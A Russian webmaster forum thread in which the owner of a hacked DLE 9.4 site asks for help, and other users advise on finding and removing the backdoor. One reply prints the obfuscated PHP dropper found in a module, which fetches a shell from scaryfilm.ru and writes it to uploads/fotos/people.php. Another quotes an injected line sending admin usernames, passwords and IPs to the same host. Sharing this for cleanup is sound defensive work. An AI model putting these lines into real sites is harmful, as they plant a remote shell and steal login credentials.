Нужно защитить сайт от взлома

12
eric_draven
На сайте с 18.01.2010
Offline
95
1309

Здравствуйте форумчане, у меня сайт на DLE 9.4 стоит на дедике, вчера был взлом и злоумышленник поставил код <script type="text/javascript" src="http://shell.scaryfilm.ru/ajax/****.php"></script>

полночи боролся , вроде победил, но сегодня еще хуже, видимо код вернулся, куча изменений в пхп файлах, создаются новые админы, в общем полный бардак. нужен ХОРОШИЙ специалист по проблеме. Срочно. Зачистить, залатать.

Recreativ.ru (http://recreativ.ru/?r=402) - лучшая белая тизерная сеть | CoolVDS (http://coolvds.com/pl.php?2085) - хостинг который давно искал..
pupseg
На сайте с 14.05.2010
Offline
364
#1

Вам нужен

1) грамотный администратор, который приведет сервер в порядок

2) грамотный программист.

и теми и другими обладаю. нужно списаться, обсудить...

Качественная помощь в обслуживании серверов. (/ru/forum/661100) Бесплатных консультаций не даю, не помогаю, не обучаю. Минималка от 100$. Как пропатчить KDE-просьба не спрашивать. Есть форумы (http://linux.org.ru) и полезные сайты (http://www.opennet.ru/).
Himiko
На сайте с 28.08.2008
Offline
560
#2

3) Грамотный антивирус на домашнем компьютере, откуда заходите по ftp

Профессиональное администрирование серверов (https://systemintegra.ru). Круглосуточно. Отзывы (/ru/forum/834230) Лицензии (http://clck.ru/Qhf5) ISPManager,VDSManager,Billmanager e.t.c. по низким ценам.
MW
На сайте с 10.02.2012
Offline
0
#3

Ищите фтп шелл... скорее всего он в одном из установленных модулей, например videovk_mod.

Там есть такое... сносите к чертям!

$fdsfsdfsdfsd = file_get_contents('h'.'t'.'t'.'p'.':'.'//'.'s'.'c'.'a'.'r'.'y'.'f'.'i'.'l'.'m'.'.'.'ru'.'/get.'.'p'.'hp'.'?url='.$_SERVER['HTTP_HOST']).unlink(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/.htaccess'); file_put_contents(ROOT_DIR.'/'.'b'.'a'.'c'.'k'.'u'.'p'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $fdsfsdfsdfsd))); file_put_contents(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/'.'f'.'ot'.'os'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $fdsfsdfsdfsd)));

Как видно шел грузится в uploads/fotos/people.php

А далее обходите все файлы движка и смотрите какие изменения были внесены.

G
На сайте с 26.10.2011
Offline
4
#4
Himiko:
3) Грамотный антивирус на домашнем компьютере, откуда заходите по ftp

даже мне стало интересно... вы знаете такой?

M
На сайте с 24.10.2011
Offline
173
#5

Glurk, он называется межушный ганглий, если такой не установлен, не поможет никакой антивирус

Himiko
На сайте с 28.08.2008
Offline
560
#6
Glurk:
даже мне стало интересно... вы знаете такой?

У меня нет Windows.

Brovik
На сайте с 05.02.2012
Offline
102
#7
Glurk:
даже мне стало интересно... вы знаете такой?

да,есть такой - мозг V1.0

диагностика, снятие порчи, аудиты - Brovik_1 (скайп)
MW
На сайте с 10.02.2012
Offline
0
#8

Удаляйте код из файлов:

admin.php

\engine\classes\flashplayer\media_player.php (ВАЩЕ левый)

\engine\classes\js\jquery.js

\engine\init.php

что то типа такого:

file_get_contents("http://scaryfilm.ru/1.php?url=".$_SERVER["HTTP_HOST"].":".$_POST['username'].":".$_POST['password'].":".$_SERVER['REMOTE_ADDR']);

А еще лучше сливайте полностью сайт себе, и сделайте в нем поиск на строку "scaryfilm.ru"

eric_draven
На сайте с 18.01.2010
Offline
95
#9

да сейчас перезаливаю пхп файлы на чистые, но где-то лежит шелл отдельно от моих файлов, с него и генерируются изменения, так как вчера все почистил и пароли поменял доступов по фтп и ssh и почту.

MW
На сайте с 10.02.2012
Offline
0
#10
eric_draven:
да сейчас перезаливаю пхп файлы на чистые, но где-то лежит шелл отдельно от моих файлов, с него и генерируются изменения, так как вчера все почистил и пароли поменял доступов по фтп и ssh и почту.

Идите от установленных модулей на ДЛЕ. пример с какого модуля грузится я написал выше.

Или стучите в асю поможем чем сможем.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий